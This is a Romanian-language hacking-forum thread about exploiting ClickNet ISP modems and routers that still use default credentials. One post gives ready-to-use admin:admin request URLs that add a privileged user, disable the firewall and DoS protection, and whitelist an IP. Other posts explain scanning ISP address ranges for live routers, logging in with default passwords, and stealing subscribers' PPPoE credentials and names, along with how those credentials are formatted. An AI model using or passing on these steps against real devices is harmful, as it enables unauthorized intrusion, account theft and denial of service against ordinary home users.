Jump to content
Acidripp

Clicknet dns exploit

Recommended Posts

la 100 metri de ei eu aveam net cate 5 minute/ora de la ei, dupa un an de chin si de chemari insistente pe marii tehnicieni am zdrobit modemul cu ciocanu si fix in ziua aia am fost la rds sa fac contract. acum..10MB/s cu 5/MB/s fara nici cea mai mica intrerupere de conexiune, UNS! cum rezistati cu clicknet nu inteleg, platesti de`ti sar capacele pt. viteza low si mai au si restrictii! varza

What !? 6MB download, nu mi-a cazut netul decat de 2 ori in 4 ani, asistenta 24 din 24 la 40 RON.

Link to comment
Share on other sites

mujahedin,problema pe care o aveai si tu,o puteai rezolva folosind google...

cel mai probabil aveai speedtouch 516v6,el e sensibil la fluctuatiile de curent,si electrica ne serveste foarte foarte des asemenea cadouri,astfel picandu-ti netu.problema asta o rezolvai din cmd,te logai in modem,si dezactivai protectia la fluctuatii...eureka

desigur,puteai sa folosesti si DMT,cu ajutorul careia sacrificai un pic din viteza,pentru cresterea snr-ului,creand astfel o conexiune stabila :)

eu acum am modem huawei si nu imi pica netul deloc,fara sa trebuiasca sa umblu la el.singura chestie nasoala e ca nu pot sa folosesc un dyndns :(

Link to comment
Share on other sites

Credeam ca se poate accesa doar interfata routerelor Huawei MT882, dar nu e asa. Tocmai ce am scris in browser IP-ul unui amic, care are internet de la ClickNet, insa printr-un router wireless Edimax, la care este desigur conectat prin wireless, si dupa ce am dat enter, mi-a cerut datele de autentificare, le stiam, le-am scris si surpriza, m-am conectat la router-ul lui. Hm.. Sunt afectate doar IP-urile de genul 92.80.***.*** ?

Link to comment
Share on other sites

prin intermediul acestor modemuri se poate da un ddos ,deoarece au deschis si portul 23 (telnet).

alte chestii

pentru a adauga un user :

http://admin:admin@ip_vulnerabil/Action?user_id=rst_center&priv=1&pass1=parola1&pass2=parola2&id=70

dezactivare firewall

http://admin:admin@ip_vulnerabil/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70

adaugare ip sa treaca de firewall

http://admin:admin@ip_vulnerabil/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gatew

http://www.milw0rm.com

Edited by al3x4ndru
Link to comment
Share on other sites

aceasi chestie este valabila si la routere.majoritatea care vin din fabrica au un default username si pass,il poti gasi si de pe net in manualul de instructiune.most of them buy them,plug em in and there you go,you've got internet,there's nothing left to worry about.din cate routere am accesat,cam 85% aveau parola default.

Link to comment
Share on other sites

dai scan cu angry ip scanner pe ipurle rtc iar la care sunt alive doar te conectezi cu mozilla , introduci user/pass (la majoritatea sunt datele default cum a zis si wildchild) si poti sa-i dai si restart la router , ii afli numele (la persoane fizice userul si parola de la net sunt compuse din nume+prenume sau doar o parte din prenume in caz ca nu se incadreaza in limita de caractere) si multe altele gen parametrii).

de obicei user dat de rtc= numeprenume_judet (abreviat) ex: B,CT etc

Link to comment
Share on other sites

Acu' daca tot s-a redeschis discutia despre chestia asta, as avea o curiozitate:

O persoana A este online. O persoana B acceseaza router-ul lui A, ia datele de autentificare PPoE, reseteaza modemul, isi deschide o noua conexiune PPoE pe propriul sistem, folosind datele proaspat furate. A observa ca nu-i merge netu'. Intra repede pe interfata router-ului si introduce datele PPoE.

Va putea A sa se conecteze la Internet, cat timp contul pe care incearca sa-l acceseze prin intermediul router-ului este folosit de altcineva?

Hm..de fapt, tocmai m-am lamurit. Nu poti folosi in cont PPoE in timp ce este folosit de altcineva, indiferent de metoda de access (router/ conexiune ppoe).

Deci daca cineva iti fura datele PPoE, tre' sa astepti sa iasa ala de pe internet, ca sa revii pe internet cu datele tale.

Totusi, am o idee..:-? Se poate schimba parola PPoE? Cum?:>

Link to comment
Share on other sites

Nu poti sa o schimbi tu, ea este data de catre ISP. Numai cei de la provider o pot modifica.

Hm..sa vad cum oi face.. Poate o schimb, ca nu se stie niciodata;))

Aia de la provider numeprenume_Judet ( http://IP/WAN.html ) nu merge sa o schimbi poti sa scrii ceva la misto ca daca ii dai restart se conecteaza netul din nou.

Dar intaii sa scrii la aia de la provider sa ii schimbi parola de la modem aia cu admin:admin (http://IP/rpSysAdmin.html ).

WTF? Ce zici ma tu acolo? /:)

Link to comment
Share on other sites

Acu' daca tot s-a redeschis discutia despre chestia asta, as avea o curiozitate:

Va putea A sa se conecteze la Internet, cat timp contul pe care incearca sa-l acceseze prin intermediul router-ului este folosit de altcineva?

nu mai stiu sigur dar acum ceva timp m-am logat cu datele unui vecin si-a mers....poate merge doar daca userii sunt legati la aceeasi cutie terminala sau nustiu nu am idee

Link to comment
Share on other sites

nu mai stiu sigur dar acum ceva timp m-am logat cu datele unui vecin si-a mers....poate merge doar daca userii sunt legati la aceeasi cutie terminala sau nustiu nu am idee

Tu te-ai logat in timp ce vecinul ala al tau era online? Nu cred.

In fine... hai mai bine sa nu mai postam in topicul asta. Incetul cu incetul sunt sanse sa fie postate anumite chestii care ar duce la furturi masive de conturi PPoE si etc.

E buna ideea, domnilor moderatori si admini? :)

Link to comment
Share on other sites

Guest demisec

Clicknetul se bazeaza pe faptul ca ei ofera internet mai mult in mediul rural, unde nu sunt asa de multe persoane familiarizate cu calculatorul, cu atat mai putin persoane care sa stie sa isi modifice macar setarile in PpOE.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...